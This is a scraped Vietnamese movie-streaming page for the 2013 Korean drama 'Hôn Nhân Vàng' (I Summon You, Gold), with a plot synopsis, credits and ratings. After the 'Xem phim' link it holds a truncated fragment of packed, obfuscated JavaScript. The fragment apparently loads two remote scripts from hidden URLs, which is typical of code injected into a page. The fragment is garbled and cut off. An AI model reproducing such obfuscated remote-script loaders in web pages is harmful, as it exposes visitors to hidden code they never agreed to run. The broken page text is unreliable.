Banner C1
Banner C1

Phim

Hôn Nhân Vàng - HTV2

Xem Phim Hôn Nhân Vàng
1839036 lượt xem

50/50 Phim Tình Cảm Phim Hàn Quốc

Đạo Diễn: Lee Hyung Sun ,Choi Eun Kyung

Thời lượng: 50 Tập

Năm phát hành: 2013

Xem phimXem TrailerTải Phim

4.5
1000 Star | 220 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Hôn Nhân Vàng Được sống đời sống thượng lưu là mơ ước của rất nhiều người hay nói cách khác là ai cũng mơ ước được như thế đặc biệt là những người ở tầng lớp khó khăn trong xã hội. Phim I Summon You, Gold sẽ đề cập tới khát vọng của những con người ở tầng lớp trung lưu vươn tới vị trí cao hơn ở xã hội đồng thời phim cũng nói đến những khác biệt, những cách cư xử khác nhau của những người khác nhau.
Hôn Nhân Vàng
Park Hyun Soo xuất thân từ tầng lớp thượng lưu nhưng cuộc đời anh luôn có những mảng mây đen che lấp. Anh là người thừa kế gia sản của một gia tộc kinh doanh kim cương nhưng lại luôn sống khép kín vì mẹ mất từ nhỏ và không dành được tình yêu thương từ bố. Đặc biệt hôn nhân của anh cũng tan vỡ do sự tham vọng của người vợ. bắt đầu cuộc sống mới của Hyun Soo khi anh gặp cô gái bán trang sức lề đường tên Jung Mong Hee - người có gương mặt rất giống với vợ anh... Chuc cac ban xem phim vui ve !.
 

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer
9
220
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Hôn Nhân Vàng

Banner C1

User Online
Banner C1
Banner C1
loading...